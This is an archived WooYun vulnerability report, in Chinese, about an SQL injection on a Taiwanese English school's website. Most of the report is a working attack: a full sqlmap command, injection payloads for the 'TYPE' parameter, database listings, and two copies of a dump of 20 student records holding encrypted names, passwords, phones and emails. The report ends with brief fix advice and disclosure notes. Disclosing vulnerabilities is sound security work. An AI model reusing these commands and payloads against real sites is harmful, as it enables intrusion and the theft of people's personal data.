乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-02: 厂商已经确认,细节仅向厂商公开 2015-12-12: 细节向核心白帽子及相关领域专家公开 2015-12-22: 细节向普通白帽子公开 2016-01-01: 细节向实习白帽子公开 2016-01-16: 细节向公众公开
唐威廉美語主站存在SQL註射漏洞(大量用戶密碼及個人隱私泄露)
地址:http://**.**.**.**/more.php?TYPE=news&PAGE=7
$ python sqlmap.py -u "http://**.**.**.**/more.php?TYPE=news&PAGE=7" -p TYPE --technique=BE --random-agent --batch -D williamschool_www -T stud_file -C stud_Cname,stud_Pass,stud_Tele,stud_Emai,stud_Fnam --dump --start 1 --stop 20
| stud_file | 247 |
Database: williamschool_wwwTable: stud_file[20 entries]+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+| stud_Cname | stud_Pass | stud_Tele | stud_Emai | stud_Fnam |+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+| 9djS9bBEc01z1q9zIS7E+g== | SZc6xzxNzgI= | 67K+AVNu3WzCMPjIVLHQ2w== | /7OfI++7UkPonJftn7NgIdyux/65QuB9 | 唐威廉美語三峽北大校 || 7JB4eQyL87leVTIBQ0vlKQ== | dZ9lQTmZ+LS6hdR8DMPlyQ== | 9TNB7Tr+H8k/CR/NgmRIpA== | /FJEqAXHtkqB3ESa4bYPHCsgsh9xQFEM | 唐威廉美語新莊光華校 || UZcx4hibRd08TQxzT9JF9w== | Tzb86Nd7SrtSqybg1lvsNw== | 19ybV86qISatJ6dYAKQFxQ== | /fJlpgqVocGNTpcIZzwoAeAzPWl+eRa6 | 唐威廉美語三峽北大校 || V3m2Agv1fUeiGe37rXcfIw== | 5l1bpgMDvjU= | awni0P5GRq5IG8SnsFoMHw== | /Vn8L/asN6ozB4cPtEDxI4zHRI8ghnUqvyQfc01z9L8= | 唐威廉美語新莊光華校 || vzGDyl0jhMT9LJfeUd0qVA== | KFTOcEE1X7i/JB9zTXP0vw== | pttaTbLZIZk/CjZRa4/hMg== | +4KOktSoAZDfGRIvIOXyOZHIqEE6R/qQ | 唐威廉美語三峽北大校 || XsvzsrtfuZL+lCZC3Vm/iA== | S3AJ2/8ljzZFhS9TBPsLfQ== | asAGDo9MaDB2bX8Lp9NRqA== | +h6Uqm9VfD+B3ESa4bYPHCsgsh9xQFEM | 唐威廉美語板橋莒光校 || Ye7K3rziIOH9arkaeHUh8g== | 7LNfZp3oT5aZhZlV8LMcLw== | DoInEUb7kp11r8soOMbXtw== | +mBBydR4OPA1NsYUhoh5Iph4a+E7cfnM | 唐威廉美語新莊光華校 || B3YzC7eUOqrJb4upTsBDxg== | DGMwobfelvQZBMqq6UFGjQ== | 4tOTyZH1duhlZ5sFrRPalQ== | +t0MXqMznJIPe+phYpsme0Z4QXaS/khqvyQfc01z9L8= | 唐威廉美語竹南校 || c0TjfZngjHEWB5TVj+ZH6A== | jcvV8cTgn5JAO2Ouhq2whw== | uE6SeyPRqlwLA0L77c5Qbg== | 01AZDhnTUDBb5s4O6eoV5r1iK4E7xanu | 唐威廉美語新莊光華校 || c0TjfZngjHEWB5TVj+ZH6A== | Kz/+c3x4RM4= | uE6SeyPRqlwLA0L77c5Qbg== | 01AZDhnTUDBmVwicoP9tRn2BFoPp1s4G | 唐威廉美語新莊光華校 || vyQfc01z9L8= | vyQfc01z9L8= | vyQfc01z9L8= | 022lf7XpE3F3k0C2dosVIa0QC3WZPv7EvyQfc01z9L8= | <blank> || PELBJvXZorTPMJ+R3HWYNA== | LqdeDiOvA0E= | ns1Yf1fKF6Sv3CdF6KoGrw== | 0CAG8emWlMos6uiFWuRvbdyux/65QuB9 | 唐威廉美語新莊光華校 || c9EVrcaPuCBtKkfkYle6hg== | sulx1LFa1Ow= | q1OZ8m4qZgqC7DR9WUDlbA== | 0cpqhjyu1UDFUQQvvUciv9yux/65QuB9 | 唐威廉美語彰化校 || xULdD/95fGvtD0M2u5IB0w== | 07D267z3yWO/JB9zTXP0vw== | 1tMnTV9r1Pry5qOwsHBuLQ== | 0tzRVagPmTPfGARcs0ZKK6vbI8BsaEVQ | 唐威廉美語三峽北大校 || rbuJZT1o+Yv/0w9usFBfiw== | nLNGCfCcbmEeqpUbus/11A== | igLnWOCXT8CKHX/5XAKr9g== | 150H4b91GmIbMrzvAxyf1F4LOxreGD1+ | 唐威廉美語三峽北大校 || j+nc8QtutXRtKkfkYle6hg== | 9oMjnTutwzi+W1DjDcZilw== | XQBJL1Q8neFAO2Ouhq2whw== | 1h7LEAU/YyQ72EGTXOctjqvbI8BsaEVQ | 唐威廉美語三峽北大校 || XyUzvNSgOH65X1C5C7yagg== | s4PSI7k55GC/JB9zTXP0vw== | Hrb0aJhwqH5X3pCmXAlTBA== | 1x1kAIphBZ5kkAtlYdhAIavbI8BsaEVQ | 唐威廉美語彰化校 || MXMAtHwRpwg8TQxzT9JF9w== | VqYwIdqUnCK/JB9zTXP0vw== | pvOh9gQ8NF7miXWaLBpspg== | 23j7NYdb1RbBzLli2H+I8dvDYNg0vVGw | 唐威廉美語板橋莒光校 || Mey0rEZTmyY= | TZW8t1zrcVm/JB9zTXP0vw== | 5NJwNPTuz7RNHunRZ9YimA== | 2FOb9q7gjvdA0wqAFjo+gqvbI8BsaEVQ | 唐威廉美語三峽北大校 || yu0cTdAbEc8CfDTNTR67Ow== | YDKzUXsl8NaSsYjerHOZeA== | 2EKNHSJWqHDG3KUYVG1b8Q== | 2l3OxkWC3LvmT6yAwOBrq9yux/65QuB9 | 唐威廉美語三峽北大校 |+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+
---Parameter: TYPE (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: TYPE=-2339' OR 5779=5779#&PAGE=7 Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: TYPE=-6744' OR 1 GROUP BY CONCAT(0x71707a7871,(SELECT (CASE WHEN (1419=1419) THEN 1 ELSE 0 END)),0x71766b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&PAGE=7---web application technology: PHP 5.3.29back-end DBMS: MySQL >= 5.0.0current user: 'www@%'current user is DBA: Falsedatabase management system users [1]:[*] 'www'@'%'Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 1016 || SESSION_VARIABLES | 329 || GLOBAL_VARIABLES | 317 || GLOBAL_STATUS | 312 || SESSION_STATUS | 312 || COLLATION_CHARACTER_SET_APPLICABILITY | 197 || COLLATIONS | 197 || STATISTICS | 112 || PARTITIONS | 109 || TABLES | 109 || KEY_COLUMN_USAGE | 74 || TABLE_CONSTRAINTS | 71 || CHARACTER_SETS | 39 || PLUGINS | 23 || SCHEMA_PRIVILEGES | 18 || ENGINES | 9 || SCHEMATA | 2 || PROCESSLIST | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+Database: williamschool_www+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| page_tags | 18370 || card_file | 5576 || photo_pictures | 3914 || hwor_file | 2052 || mp3u_file | 1897 || page_rssnews2 | 1749 || page_news | 1609 || page_rssnews | 1306 || logi_file | 1134 || fb_1000 | 1099 || page_freeco | 651 || fb_tests | 506 || page_alliance | 267 || stud_file | 247 || page_sms | 228 || photo_config | 204 || page_dynco | 190 || page_sms_back | 180 || photo_filetypes | 105 || photo_albums | 77 || page_keyword | 74 || page_keyword_0908 | 74 || photo_languages | 67 || fb_user | 56 || page_links | 30 || photo_categories | 28 || page_homco | 27 || teac_file | 21 || page_fran | 20 || page_fran2 | 19 || photo_comments | 17 || coun_file | 10 || page_topalli | 10 || page_topeven | 10 || page_topnews | 10 || photo_usergroups | 9 || photo_bridge | 7 || bbs_file | 5 || page_dynme | 5 || page_freeme | 5 || page_mail | 5 || page_rss | 5 || page_rss2 | 5 || page_user | 5 || opti_file | 3 || page_file | 3 || page_homme | 3 || photo_users | 2 || photo_votes | 2 || comp_config | 1 || page_config | 1 || page_frane | 1 || page_star | 1 || page_star_bak | 1 || photo_mod_online | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: williamschool_wwwTable: photo_albums[2 columns]+-------------------+-------------+| Column | Type |+-------------------+-------------+| alb_password | varchar(32) || alb_password_hint | text |+-------------------+-------------+Database: williamschool_wwwTable: page_user[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| user_pass | varchar(20) |+-----------+-------------+Database: williamschool_wwwTable: stud_file[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| stud_Pass | varchar(30) |+-----------+-------------+Database: williamschool_wwwTable: teac_file[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| teac_Pass | varchar(20) |+-----------+-------------+Database: williamschool_wwwTable: photo_users[1 column]+---------------+-------------+| Column | Type |+---------------+-------------+| user_password | varchar(40) |+---------------+-------------+Database: williamschool_wwwTable: page_fran[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| fran_Pass | varchar(50) |+-----------+-------------+
---Parameter: TYPE (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: TYPE=-2339' OR 5779=5779#&PAGE=7 Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: TYPE=-6744' OR 1 GROUP BY CONCAT(0x71707a7871,(SELECT (CASE WHEN (1419=1419) THEN 1 ELSE 0 END)),0x71766b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&PAGE=7---web application technology: PHP 5.3.29back-end DBMS: MySQL 5Database: williamschool_wwwTable: stud_file[23 columns]+------------+--------------+| Column | Type |+------------+--------------+| stud_Addr | varchar(120) || stud_Auth | varchar(10) || stud_Birth | varchar(24) || stud_Cdate | date || stud_Cname | varchar(35) || stud_Cuse | varchar(25) || stud_Edate | date || stud_Emai | varchar(100) || stud_Enam | varchar(25) || stud_Fnam | varchar(30) || stud_Fran | int(3) || stud_Leve | int(2) || stud_Mdate | date || stud_Muse | varchar(25) || stud_Pass | varchar(30) || stud_Pem1 | varchar(100) || stud_Pem2 | varchar(100) || stud_Phon | varchar(40) || stud_Pnam | varchar(25) || stud_Prea | varchar(15) || stud_SN | int(11) || stud_Stau | varchar(1) || stud_Tele | varchar(40) |+------------+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: TYPE (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: TYPE=-2339' OR 5779=5779#&PAGE=7 Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: TYPE=-6744' OR 1 GROUP BY CONCAT(0x71707a7871,(SELECT (CASE WHEN (1419=1419) THEN 1 ELSE 0 END)),0x71766b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&PAGE=7---web application technology: PHP 5.3.29back-end DBMS: MySQL 5Database: williamschool_wwwTable: stud_file[20 entries]+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+| stud_Cname | stud_Pass | stud_Tele | stud_Emai | stud_Fnam |+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+| 9djS9bBEc01z1q9zIS7E+g== | SZc6xzxNzgI= | 67K+AVNu3WzCMPjIVLHQ2w== | /7OfI++7UkPonJftn7NgIdyux/65QuB9 | 唐威廉美語三峽北大校 || 7JB4eQyL87leVTIBQ0vlKQ== | dZ9lQTmZ+LS6hdR8DMPlyQ== | 9TNB7Tr+H8k/CR/NgmRIpA== | /FJEqAXHtkqB3ESa4bYPHCsgsh9xQFEM | 唐威廉美語新莊光華校 || UZcx4hibRd08TQxzT9JF9w== | Tzb86Nd7SrtSqybg1lvsNw== | 19ybV86qISatJ6dYAKQFxQ== | /fJlpgqVocGNTpcIZzwoAeAzPWl+eRa6 | 唐威廉美語三峽北大校 || V3m2Agv1fUeiGe37rXcfIw== | 5l1bpgMDvjU= | awni0P5GRq5IG8SnsFoMHw== | /Vn8L/asN6ozB4cPtEDxI4zHRI8ghnUqvyQfc01z9L8= | 唐威廉美語新莊光華校 || vzGDyl0jhMT9LJfeUd0qVA== | KFTOcEE1X7i/JB9zTXP0vw== | pttaTbLZIZk/CjZRa4/hMg== | +4KOktSoAZDfGRIvIOXyOZHIqEE6R/qQ | 唐威廉美語三峽北大校 || XsvzsrtfuZL+lCZC3Vm/iA== | S3AJ2/8ljzZFhS9TBPsLfQ== | asAGDo9MaDB2bX8Lp9NRqA== | +h6Uqm9VfD+B3ESa4bYPHCsgsh9xQFEM | 唐威廉美語板橋莒光校 || Ye7K3rziIOH9arkaeHUh8g== | 7LNfZp3oT5aZhZlV8LMcLw== | DoInEUb7kp11r8soOMbXtw== | +mBBydR4OPA1NsYUhoh5Iph4a+E7cfnM | 唐威廉美語新莊光華校 || B3YzC7eUOqrJb4upTsBDxg== | DGMwobfelvQZBMqq6UFGjQ== | 4tOTyZH1duhlZ5sFrRPalQ== | +t0MXqMznJIPe+phYpsme0Z4QXaS/khqvyQfc01z9L8= | 唐威廉美語竹南校 || c0TjfZngjHEWB5TVj+ZH6A== | jcvV8cTgn5JAO2Ouhq2whw== | uE6SeyPRqlwLA0L77c5Qbg== | 01AZDhnTUDBb5s4O6eoV5r1iK4E7xanu | 唐威廉美語新莊光華校 || c0TjfZngjHEWB5TVj+ZH6A== | Kz/+c3x4RM4= | uE6SeyPRqlwLA0L77c5Qbg== | 01AZDhnTUDBmVwicoP9tRn2BFoPp1s4G | 唐威廉美語新莊光華校 || vyQfc01z9L8= | vyQfc01z9L8= | vyQfc01z9L8= | 022lf7XpE3F3k0C2dosVIa0QC3WZPv7EvyQfc01z9L8= | <blank> || PELBJvXZorTPMJ+R3HWYNA== | LqdeDiOvA0E= | ns1Yf1fKF6Sv3CdF6KoGrw== | 0CAG8emWlMos6uiFWuRvbdyux/65QuB9 | 唐威廉美語新莊光華校 || c9EVrcaPuCBtKkfkYle6hg== | sulx1LFa1Ow= | q1OZ8m4qZgqC7DR9WUDlbA== | 0cpqhjyu1UDFUQQvvUciv9yux/65QuB9 | 唐威廉美語彰化校 || xULdD/95fGvtD0M2u5IB0w== | 07D267z3yWO/JB9zTXP0vw== | 1tMnTV9r1Pry5qOwsHBuLQ== | 0tzRVagPmTPfGARcs0ZKK6vbI8BsaEVQ | 唐威廉美語三峽北大校 || rbuJZT1o+Yv/0w9usFBfiw== | nLNGCfCcbmEeqpUbus/11A== | igLnWOCXT8CKHX/5XAKr9g== | 150H4b91GmIbMrzvAxyf1F4LOxreGD1+ | 唐威廉美語三峽北大校 || j+nc8QtutXRtKkfkYle6hg== | 9oMjnTutwzi+W1DjDcZilw== | XQBJL1Q8neFAO2Ouhq2whw== | 1h7LEAU/YyQ72EGTXOctjqvbI8BsaEVQ | 唐威廉美語三峽北大校 || XyUzvNSgOH65X1C5C7yagg== | s4PSI7k55GC/JB9zTXP0vw== | Hrb0aJhwqH5X3pCmXAlTBA== | 1x1kAIphBZ5kkAtlYdhAIavbI8BsaEVQ | 唐威廉美語彰化校 || MXMAtHwRpwg8TQxzT9JF9w== | VqYwIdqUnCK/JB9zTXP0vw== | pvOh9gQ8NF7miXWaLBpspg== | 23j7NYdb1RbBzLli2H+I8dvDYNg0vVGw | 唐威廉美語板橋莒光校 || Mey0rEZTmyY= | TZW8t1zrcVm/JB9zTXP0vw== | 5NJwNPTuz7RNHunRZ9YimA== | 2FOb9q7gjvdA0wqAFjo+gqvbI8BsaEVQ | 唐威廉美語三峽北大校 || yu0cTdAbEc8CfDTNTR67Ow== | YDKzUXsl8NaSsYjerHOZeA== | 2EKNHSJWqHDG3KUYVG1b8Q== | 2l3OxkWC3LvmT6yAwOBrq9yux/65QuB9 | 唐威廉美語三峽北大校 |+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+
上WAF。
危害等级:高
漏洞Rank:16
确认时间:2015-12-02 15:09
感謝通報
2016-01-12:HITCON 於接獲通報後除 email 該網站所示之服務信箱外,亦曾致電該網站負責人告知此漏洞,但對方至今仍無回應。